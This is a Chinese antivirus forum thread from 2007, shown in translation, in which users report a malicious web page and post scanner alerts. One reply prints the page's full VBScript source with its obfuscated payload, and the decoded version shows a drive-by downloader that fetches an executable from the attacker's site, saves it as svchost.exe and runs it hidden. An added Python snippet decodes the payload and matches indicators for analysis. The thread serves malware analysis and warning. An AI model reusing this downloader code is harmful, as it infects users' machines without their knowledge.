Views: 3641 | Replies: 13
KV web page monitor: virus

kp2006
Posted on 2007-3-8 23:50:27
http://www.57cj.com/url.html

[ This post was last edited by kp2006 on 2007-3-8 23:54 ]
jlennon
Posted on 2007-3-8 23:52:22
What's this about? Reserving the spot first?
The EQs
Posted on 2007-3-9 00:28:44
NOD32 antivirus system alert: IMON
Infiltration detected !  

Infiltration details:

   Web page:
   http://www.57cj.com/url.html


   Infiltration:
   HTML/TrojanDownloader.Agent.BW trojan

   Description:
   Access to the web page was blocked by IMON.

小邪邪
Posted on 2007-3-9 00:38:01
After opening it there is nothing at all, you just see: Fri Mar 09 00:36:31 2007

ly250094040
Posted on 2007-3-9 00:50:45

Reply to #4, 小邪邪's post

You needn't bother showing up here.

Those rules of yours aren't comparable with ordinary antivirus software.
jlennon
Posted on 2007-3-9 00:55:47
Fri Mar 09 00:55:39 2007

McAfee's Access Protection was not triggered at all.

[ This post was last edited by jlennon on 2007-3-9 00:56 ]
westbeck
Posted on 2007-3-9 01:44:50
The page source is as follows:
<SCRIPT language=VBScript>
on error resume next
dl = "http://www.57cj.com/hipdit.exe"
function rechange(k)
s=Split(k,",")
t=""
For i = 0 To UBound(s)
t=t+Chr(eval(s(i)))
Next
rechange=t
End Function
t="58,102,110,97,109,101,49,61,34,115,118,99,104,111,115,116,46,101,120,101,34,13,10,32,122,49,61,34,83,104,101,34,58,122,50,61,34,108,108,46,65,34,58,122,51,61,34,112,112,108,105,34,58,122,52,61,34,99,97,116,34,58,122,53,61,34,105,111,34,58,122,54,61,34,110,34,13,10,32,32,32,32,122,122,61,122,49,38,122,50,38,122,51,38,122,52,38,122,53,38,122,54,13,10,32,32,32,32,115,117,98,32,115,104,101,108,108,101,120,101,40,122,122,44,102,110,97,109,101,49,41,13,10,32,32,32,32,32,115,101,116,32,81,32,61,32,100,102,46,99,114,101,97,116,101,111,98,106,101,99,116,40,122,122,44,34,34,41,58,81,46,83,104,101,108,108,69,120,101,99,117,116,101,32,102,110,97,109,101,49,44,34,34,44,34,34,44,34,111,112,101,110,34,44,48,13,10,32,32,101,110,100,32,115,117,98,13,10,32,32,32,32,116,49,61,34,99,108,115,105,100,58,34,58,116,50,61,34,66,68,57,54,67,53,53,54,45,34,58,116,51,61,34,54,53,65,51,45,34,58,116,52,61,34,49,49,68,48,45,34,58,116,53,61,34,57,56,51,65,45,34,58,116,54,61,34,48,48,67,48,52,70,67,50,57,69,51,54,34,13,10,32,32,32,32,116,55,61,116,49,38,116,50,38,116,51,38,116,52,38,116,53,38,116,54,13,10,32,32,32,32,83,101,116,32,100,102,32,61,32,100,111,99,117,109,101,110,116,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,34,111,98,106,101,99,116,34,41,13,10,32,32,32,32,100,102,46,115,101,116,65,116,116,114,105,98,117,116,101,32,34,99,108,97,115,115,105,100,34,44,32,116,55,13,10,32,32,32,32,98,52,61,34,77,105,34,58,98,53,61,34,99,114,34,58,98,54,61,34,111,34,58,98,55,61,34,115,111,102,116,34,58,98,56,61,34,46,88,34,58,98,57,61,34,77,34,58,98,49,48,61,34,76,34,58,98,49,49,61,34,72,34,58,98,49,50,61,34,84,34,58,98,49,51,61,34,84,34,58,98,49,52,61,34,80,34,13,10,32,32,32,32,115,116,114,98,61,98,52,38,98,53,38,98,54,38,98,55,38,98,56,38,98,57,38,98,49,48,38,98,49,49,38,98,49,50,38,98,49,51,38,98,49,52,13,10,32,32,32,32,83,101,116,32,120,32,61,32,100,102,46,67,114,101,97,116,101,79,98,106,101,99,116,40,115,116,114,98,44,34,34,41,13,10,32,32,32,32,97,52,61,34,65,34,58,97,53,61,34,100,34,58,9
7,54,61,34,111,34,58,97,55,61,34,100,34,58,97,56,61,34,98,34,58,97,57,61,34,46,34,58,97,49,48,61,34,83,34,58,97,49,49,61,34,116,34,58,97,49,50,61,34,114,34,58,97,49,51,61,34,101,34,58,97,49,52,61,34,97,34,58,97,49,53,61,34,109,34,13,10,32,32,32,32,115,116,114,100,61,97,52,38,97,53,38,97,54,38,97,55,38,97,56,38,97,57,38,97,49,48,38,97,49,49,38,97,49,50,38,97,49,51,38,97,49,52,38,97,49,53,13,10,32,32,32,32,115,101,116,32,83,83,32,61,32,100,102,46,99,114,101,97,116,101,111,98,106,101,99,116,40,115,116,114,100,44,34,34,41,13,10,32,32,32,32,83,83,46,116,121,112,101,32,61,32,49,13,10,32,32,32,32,102,52,61,34,71,34,58,102,53,61,34,69,34,58,102,54,61,34,84,34,13,10,32,32,32,32,115,116,114,101,61,102,52,38,102,53,38,102,54,13,10,32,13,10,32,32,32,32,120,46,79,112,101,110,32,115,116,114,101,44,32,100,108,44,32,70,97,108,115,101,13,10,32,32,32,32,120,46,83,101,110,100,13,10,32,32,32,32,13,10,32,32,32,32,115,101,116,32,70,32,61,32,100,102,46,99,114,101,97,116,101,111,98,106,101,99,116,40,34,83,99,114,105,112,116,105,110,103,46,70,105,108,101,83,121,115,116,101,109,79,98,106,101,99,116,34,44,34,34,41,13,10,32,32,32,32,116,109,112,50,61,50,13,10,32,32,32,32,115,101,116,32,116,109,112,32,61,32,70,46,71,101,116,83,112,101,99,105,97,108,70,111,108,100,101,114,40,116,109,112,50,41,13,10,32,32,32,32,83,83,46,111,112,101,110,13,10,32,32,32,32,102,110,97,109,101,49,61,32,70,46,66,117,105,108,100,80,97,116,104,40,116,109,112,44,102,110,97,109,101,49,41,13,10,32,32,32,32,83,83,46,119,114,105,116,101,32,120,46,114,101,115,112,111,110,115,101,66,111,100,121,13,10,32,32,32,32,83,83,46,115,97,118,101,116,111,102,105,108,101,32,102,110,97,109,101,49,44,50,13,10,32,32,32,32,83,83,46,99,108,111,115,101,13,10,32,99,97,108,108,32,115,104,101,108,108,101,120,101,40,122,122,44,102,110,97,109,101,49,41"

i=t
execute(rechange(I))
</SCRIPT><script type="text/jscript">function init() { document.write(Date());}window.onload = init;</script>
</HEAD>
<BODY></BODY></HTML>
The value of t is encoded; decoding the decimal values gives:
:fname1="svchost.exe"
z1="She":z2="ll.A":z3="ppli":z4="cat":z5="io":z6="n"
    zz=z1&z2&z3&z4&z5&z6
    sub shellexe(zz,fname1)
     set Q = df.createobject(zz,""):Q.ShellExecute fname1,"","","open",0
  end sub
    t1="clsid:":t2="BD96C556-":t3="65A3-":t4="11D0-":t5="983A-":t6="00C04FC29E36"
    t7=t1&t2&t3&t4&t5&t6
    Set df = document.createElement("object")
    df.setAttribute "classid", t7
    b4="Mi":b5="cr":b6="o":b7="soft":b8=".X":b9="M":b10="L":b11="H":b12="T":b13="T":b14="P"
    strb=b4&b5&b6&b7&b8&b9&b10&b11&b12&b13&b14
    Set x = df.CreateObject(strb,"")
    a4="A":a5="d":a6="o":a7="d":a8="b":a9=".":a10="S":a11="t":a12="r":a13="e":a14="a":a15="m"
    strd=a4&a5&a6&a7&a8&a9&a10&a11&a12&a13&a14&a15
    set SS = df.createobject(strd,"")
    SS.type = 1
    f4="G":f5="E":f6="T"
    stre=f4&f5&f6

    x.Open stre, dl, False
    x.Send
   
    set F = df.createobject("Scripting.FileSystemObject","")
    tmp2=2
    set tmp = F.GetSpecialFolder(tmp2)
    SS.open
    fname1= F.BuildPath(tmp,fname1)
    SS.write x.responseBody
    SS.savetofile fname1,2
    SS.close
call shellexe(zz,fname1)
A VBScript script whose job is to call a custom function that decodes the value of the variable t and then runs the result with execute().
The decoded code is again VBScript; it uses Microsoft.XMLHTTP and Scripting.FileSystemObject to download the file http://www.57cj.com/hipdit.exe, and runs it through the ShellExecute method of the Shell.Application object Q.
hipdit.exe is reported by Kaspersky as: Trojan-Clicker.Win32.Flyst.d
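An added example, not part of the thread: a Python re-implementation of the decoder westbeck describes, written for analysis rather than execution, that also folds the fragment-concatenation trick so the object names his analysis identifies can actually be matched (on the raw decoded text they never appear literally). The sample lines are constructed from the decoded script above and the INDICATORS tuple lists the names and CLSID it assembles.

```python
import re

# Constructed sample: a few lines in the style of the decoded payload quoted
# above, then the same one-decimal-per-character form used by the page's t= blob.
SAMPLE_SCRIPT = (
    'z1="She":z2="ll.A":z3="ppli":z4="cat":z5="io":z6="n"\r\n'
    'zz=z1&z2&z3&z4&z5&z6\r\n'
    'b4="Mi":b5="cr":b6="o":b7="soft":b8=".X":b9="M":b10="L":b11="H":b12="T":b13="T":b14="P"\r\n'
    'strb=b4&b5&b6&b7&b8&b9&b10&b11&b12&b13&b14\r\n'
    'Set x = df.CreateObject(strb,"")\r\n'
)
SAMPLE_ENCODED = ",".join(str(ord(c)) for c in SAMPLE_SCRIPT)

# Object names and the CLSID that the analysis above identifies in the decoded script.
INDICATORS = ("Shell.Application", "Microsoft.XMLHTTP", "Adodb.Stream",
              "Scripting.FileSystemObject", "BD96C556-65A3-11D0-983A-00C04FC29E36")

ASSIGN = re.compile(r'\b(\w+)\s*=\s*"([^"]*)"')             # name="literal"
CONCAT = re.compile(r'\b(\w+)\s*=\s*((?:\w+\s*&\s*)+\w+)')  # name=a&b&c

def rechange(encoded: str) -> str:
    """Python equivalent of the page's rechange(). The original feeds every element
    to VBScript eval(); this one accepts plain decimal integers only, so the
    analyst's decoder can never execute anything from the sample."""
    chars = []
    for item in encoded.split(","):
        item = item.strip()
        if not item.isdigit():
            raise ValueError(f"non-numeric element in payload: {item!r}")
        chars.append(chr(int(item)))
    return "".join(chars)

def resolve_strings(script: str) -> dict:
    """Fold the fragment trick: collect name="literal" assignments, then join
    name=a&b&c chains whose parts are all known. VBScript identifiers are
    case-insensitive, so everything is keyed in lower case."""
    known = {n.lower(): s for n, s in ASSIGN.findall(script)}
    for name, chain in CONCAT.findall(script):
        parts = [p.strip().lower() for p in chain.split("&")]
        if all(p in known for p in parts):
            known[name.lower()] = "".join(known[p] for p in parts)
    return known

def find_indicators(script: str) -> list:
    """Indicators present literally, or only once the fragments are folded."""
    haystack = (script + " " + " ".join(resolve_strings(script).values())).lower()
    return [i for i in INDICATORS if i.lower() in haystack]
```

Running find_indicators on the raw sample without resolve_strings would report nothing, which is exactly why a string-literal signature misses this layer.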
zengmingwh
Posted on 2007-3-9 09:50:33
Virus or unwanted program 'HTML/MultiHtExp.3'
detected in file 'C:\url.html.nv!' [HTML/MultiHtExp.3].
jimmyleo
Posted on 2007-3-9 10:10:02
[WARNING] Is the Trojan horse TR/Drop.Lmir.D.3!
鼻耳盖子
Posted on 2007-3-9 11:11:27
I can't seem to open it here.